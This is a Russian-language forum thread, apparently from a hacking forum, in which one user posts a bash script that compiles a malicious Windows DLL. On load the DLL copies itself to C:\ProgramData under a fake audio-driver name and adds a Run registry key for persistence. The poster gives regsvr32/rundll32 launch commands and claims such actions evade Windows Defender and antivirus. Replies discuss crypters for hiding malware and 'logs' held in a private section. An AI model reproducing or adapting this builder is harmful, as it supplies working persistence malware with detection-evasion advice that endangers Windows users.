ReflectiveDLL

[x4k]

Многие слышали, многие видели, еще больше хотят, но не могут =) Выкладываю небольшой скрипт, .sh , который позволит любому скомпилировать reflectivedll с собственно командой за две секунды =) Требует mingw и upx для последнующей компрессии (опция, закоменнтируйте если не нужна. И так, поехали:
--------------------------------------------------------------------------------------------

#!/bin/bash

[[ -z $(type upx) ]] && apt-get -y install upx
[[ -z $(type x86_64-w64-mingw32-g++) ]] && apt-get -y install mingw-w64-x86-64-dev


#//// this.dll /////
this="/tmp/this" ; cat<<'EOF'>"$this".c
#include <stdio.h>
#include <windows.h>

#ifdef BUILD_DLL
    #define DLL_EXPORT __declspec(dllexport)
#else
    #define DLL_EXPORT __declspec(dllimport)
#endif

BOOL running = FALSE;

void DLL_EXPORT initCallback()
{      
    if(!running) {
      system("start /min C:\\Windows\\System32\\calc.exe && move this.dll C:\\ProgramData\\HDAudio.dll && reg add HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run /v HighDefinitionAudio  /t REG_SZ /f /d \"regsvr32 /s /i C:\\ProgramData\\HDAudio.dll,DllMain\"");
      running = TRUE;
    }

}

extern "C" DLL_EXPORT BOOL APIENTRY DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{
    switch (fdwReason)
    {
        case DLL_PROCESS_ATTACH:
                              initCallback();
            break;

        case DLL_PROCESS_DETACH:
                              initCallback();
            break;

        case DLL_THREAD_ATTACH:
                              initCallback();
            break;

        case DLL_THREAD_DETACH:
                              initCallback();
            break;
    }
    return TRUE;
}
EOF

#//// compile /////
x86_64-w64-mingw32-g++ -Wall -DBUILD_DLL -O2 -c $this.c -o $this.c.o
x86_64-w64-mingw32-g++ -shared -Wl,--dll $this.c.o -o $this.dll

#upx --all-methos --all-filters $this.dll
mv $this.dll ~/this.dll

Использовать очень просто: либо regsvr32 /s /i this.dll либо rundll32 this.dll,DllMain . Задачи у всех разные, но вот что рекомендую: задачи, типаreg add выполняются без триггера WD и других AV. Как использовать - думайте сами)

Кому понравилось и совсем не трудно - ткните в репу. Благодарю)

 

[peacemaker]

Кому понравилось и совсем не трудно - ткните в репу. Благодарю)

За исходники всегда +. А вот выпрашивать не красиво

Можете у нас красиво в репозитории оформить код и сюда кидать ссылками.

 

[x4k]

За репозиторий спасибо. У меня GitLab Enterprise =) Если интересно - пройдите по сайту у меня в подписи) пописываю иногда туда

 

[x4k]

Кстати на одобрении у админов еще пару постов)) Логи в приватном разделе, и в пакерах выложил так же небольшое руководство по использованию одного из лучших криптеров opensource. С примером и скриптом для билда, чтобы каждому было максимально понятно))) я - за опенсорс)

 

[MercuryOxide]

Кстати на одобрении у админов еще пару постов)) Логи в приватном разделе, и в пакерах выложил так же небольшое руководство по использованию одного из лучших криптеров opensource. С примером и скриптом для билда, чтобы каждому было максимально понятно))) я - за опенсорс)

Интересно, а криптор с твоего будущего поста с # работает?

 

[x4k]

Ой как работает) есть сомнения?)